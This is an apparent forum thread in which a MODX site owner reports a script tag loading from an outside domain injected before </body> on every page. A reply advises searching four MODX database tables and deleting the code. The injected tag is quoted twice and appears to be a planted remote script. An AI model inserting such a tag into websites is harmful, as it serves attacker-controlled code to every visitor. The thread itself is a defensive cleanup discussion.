Our modx site now has this line injected at the end of every page:
<noindex>
<script src="//stat.rolledwil.biz/stat.php?17323616676"></script>
</noindex>
right before the final </body>
tag!
How do I get rid of this?
Our modx site now has this line injected at the end of every page:
<noindex>
<script src="//stat.rolledwil.biz/stat.php?17323616676"></script>
</noindex>
right before the final </body>
tag!
How do I get rid of this?
Try to locate this code in your db: there can be 4 places - plugins, templates, chunks and content (resources) tables - modx_site_plugins, modx_site_templates, modx_site_content, modx_site_htmlsnippets.
After you find it - you can remove via query or manually.